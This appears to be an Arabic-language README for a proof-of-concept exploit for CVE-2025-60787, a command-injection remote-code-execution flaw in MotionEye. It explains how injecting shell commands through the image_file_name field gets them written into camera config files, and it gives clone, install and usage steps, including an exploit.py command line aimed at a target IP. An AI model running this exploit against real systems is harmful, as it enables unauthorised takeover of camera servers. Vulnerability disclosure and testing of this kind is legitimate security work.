
إثبات مفهوم احترافي لـ CVE-2025-60787: تنفيذ تعليمات برمجية عن بُعد في MotionEye (<= 0.43.1b4). يوضح هذا الاستغلال ثغرة حقن أوامر نظام التشغيل عبر تجاوز التحقق من صحة العميل، مما يسمح للمهاجمين بتنفيذ أوامر عشوائية من خلال ملفات التهيئة.
إثبات المفهوم الاحترافي (PoC) لـ CVE-2025-60787، وهي ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في MotionEye (الإصدارات ≤ 0.43.1b4).
تنشأ الثغرة من تجاوز التحقق من جانب العميل في وظيفة JavaScript configUiValid. بينما يتحقق واجهة المستخدم من حقول اسم الملف، يفشل جانب الخادم في تنظيف هذه المدخلات بشكل صحيح قبل كتابتها في ملفات camera-N.conf. يمكن للمهاجم حقن أوامر شل عشوائية عبر معامل image_file_name، مما يؤدي إلى اختراق كامل للنظام عند إعادة تحميل الخدمة أو إعادة تشغيلها.
اتبع هذه الخطوات لإعداد البيئة وأداة الاستغلال:
# Clone the repository
git clone [https://github.com/Rohitberiwala/Motioneye-RCE-CVE-2025-60787](https://github.com/Rohitberiwala/Motioneye-RCE-CVE-2025-60787)
cd Motioneye-RCE-CVE-2025-60787
# Install required dependencies
pip install requests
## Usage
```bash
# Execute the exploit to create a marker file in /tmp
python3 exploit.py --target [TARGET_IP] --cmd "id > /tmp/hacked"